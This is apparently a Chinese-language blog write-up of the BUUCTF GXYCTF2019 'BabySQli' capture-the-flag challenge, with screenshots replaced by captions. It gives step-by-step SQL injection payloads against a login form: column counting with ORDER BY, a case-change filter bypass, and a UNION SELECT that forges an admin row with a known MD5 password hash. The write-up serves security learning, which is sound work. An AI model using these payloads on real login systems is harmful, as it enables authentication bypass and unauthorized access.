BUUCTF[GXYCTF2019]BabySQli

BUUCTF[GXYCTF2019]BabySQli_第1张图片

SQL注入题型,在进行了自己的一些测试发现,用户名存在admin,我们F12看看源码:

BUUCTF[GXYCTF2019]BabySQli_第2张图片

 
Do you know who am I?


由于没有注释内容,所以我试试抓包看看有没有注释内容, 

BUUCTF[GXYCTF2019]BabySQli_第3张图片

base32 只有大写字母和数字数字组成,或者后面有三个等号。
base64 只有大写字母和数字,小写字母组成,后面一般是两个等号。  

可以看出这是base32加密,解密如下:

c2VsZWN0ICogZnJvbSB1c2VyIHdoZXJlIHVzZXJuYW1lID0gJyRuYW1lJw==

base64解密得到sql语句,这句话应该是提示

select * from user where username = '$name'

单引号闭合,使用payload:

name=admin'&pw=123

查看字段数:

name=admin' order by 3#&pw=123

BUUCTF[GXYCTF2019]BabySQli_第4张图片 

大小写绕过尝试:

name=admin' Order by 3#&pw=123

BUUCTF[GXYCTF2019]BabySQli_第5张图片 

name=admin' Order by 4#&pw=123 

BUUCTF[GXYCTF2019]BabySQli_第6张图片 

 字段数为3,查看回显点位,

name=admin' union select 1,2,3#&pw=123

BUUCTF[GXYCTF2019]BabySQli_第7张图片 

由于回显一样,暂时看不到,我们继续往后做。 

这里学到了一个新知识:mysql在联合查询不存在的数据时,会自动构建虚拟数据,

比如我们使用:

select * from user where username = 'wxs' union select 1,'admin','123456';

 原本库里没有123456,但mysql自动给我们加上了,相当于我们临时创建了一个admin用户,密码是123456。

所以我们假设密码是123456,其md5值为:e10adc3949ba59abbe56e057f20f883e

构造payload:

name=1' union select 1,'admin','e10adc3949ba59abbe56e057f20f883e'#&pw=123456

成功登录得到flag:

BUUCTF[GXYCTF2019]BabySQli_第8张图片

思路:利用构造一个虚拟身份来进行伪造真实身份,从而绕过审核机制。  

你可能感兴趣的:(CTF日记,sql,安全漏洞)